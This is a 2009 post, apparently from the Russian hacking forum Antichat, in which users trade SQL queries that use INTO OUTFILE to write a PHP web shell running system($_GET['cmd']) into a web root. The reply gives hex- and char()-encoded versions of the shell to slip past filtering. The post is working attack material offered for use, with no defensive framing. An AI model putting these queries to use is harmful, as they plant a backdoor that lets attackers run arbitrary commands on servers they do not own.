02.12.2009, 07:52
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от p.r0phe.t
почему запрос
SELECT '<?php system($_GET["cmd"]);?>' FROM `news` into outfile '/www/shell.php'
файл создаёт,но он пустой.
P.S. разобрался,таблицу не надо указывать.
Извините за глупость,но скажите,во что можно перекодировать php-код, чтобы в таком кодированном виде его интерпретатор всё-равно схавал?
в hex
SELECT 0x3C3F7068702073797374656D28245F4745545B22636D6422 5D293B3F3E FROM `news` into outfile '/www/shell.php'
или char
SELECT char(60,63,112,104,112,32,115,121,115,116,101,109, 40,36,95,71,69,84,91,34,99,109,100,34,93,41,59,63, 62) FROM `news` into outfile '/www/shell.php'
__________________
Появляюсь редко. Важные дела в реале.
|
|
|